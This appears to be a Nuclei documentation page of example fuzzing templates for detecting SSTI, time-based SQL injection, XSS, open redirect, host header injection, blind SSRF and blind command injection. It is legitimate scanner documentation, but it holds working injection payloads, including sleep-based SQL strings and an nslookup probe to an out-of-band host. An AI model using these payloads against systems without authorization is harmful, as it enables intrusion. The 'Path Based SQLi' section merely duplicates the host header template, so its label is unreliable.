HTTP Fuzzing
Fuzzing Examples
HTTP Fuzzing
Fuzzing Examples
Review some examples of fuzzing with Nuclei
Basic SSTI Template
A simple template to discover {{<number>*<number>}} type SSTI vulnerabilities.
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
Blind Time Based SQLi Template
A template to detect blind time based SQLi with a time delay analyzer.
id: mysql-blind-time-based-sqli
info:
name: MySQL SQLi - Blind Time based
author: pdteam
severity: critical
reference:
- https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java
http:
- payloads:
injections:
low:
- " / sleep([SLEEPTIME]) "
- "' / sleep([SLEEPTIME]) / '"
- "\" / sleep([SLEEPTIME]) / \""
medium:
- " and 0 in (select sleep([SLEEPTIME]) ) -- "
- "' and 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" and 0 in (select sleep([SLEEPTIME]) ) -- "
- " where 0 in (select sleep([SLEEPTIME]) ) -- "
- "' where 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" where 0 in (select sleep([SLEEPTIME]) ) -- "
high:
- "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
- " and 0 in (select sleep([SLEEPTIME]) ) "
- "' and 0 in (select sleep([SLEEPTIME]) ) and ''='"
- "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
attack: pitchfork
analyzer:
name: time_delay
fuzzing:
- part: request # fuzz all the request parts.
type: postfix
mode: single
fuzz:
- "{{injections}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: analyzer
words:
- "true"
Basic XSS Template
A simple template to discover XSS probe reflection in HTML pages.
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
Basic OpenRedirect Template
A simple template to discover open-redirects issues.
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
Basic Path Based SQLi
A example template to discover path-based SQLi issues.
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
Basic Host Header Injection
A simple template to discover host header injection issues.
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
Blind SSRF OOB Detection
A simple template to detect Blind SSRF in known-parameters using interactsh with HTTP fuzzing.
id: fuzz-ssrf
info:
name: Basic Blind SSRF Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
- "path"
- "continue"
- "url"
- "window"
- "next"
- "data"
- "reference"
- "site"
- "html"
- "val"
- "validate"
- "domain"
- "callback"
- "return"
- "page"
- "feed"
- "host"
- "port"
- "to"
- "out"
- "view"
- "dir"
- "show"
- "navigation"
- "open"
fuzz:
- "https://{{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
Blind CMDi OOB based detection
A simple template to detect blind CMDI using interactsh
id: fuzz-cmdi
info:
name: Basic Blind CMDI Detection
author: pdteam
severity: low
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
fuzz:
- "nslookup {{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
Was this page helpful?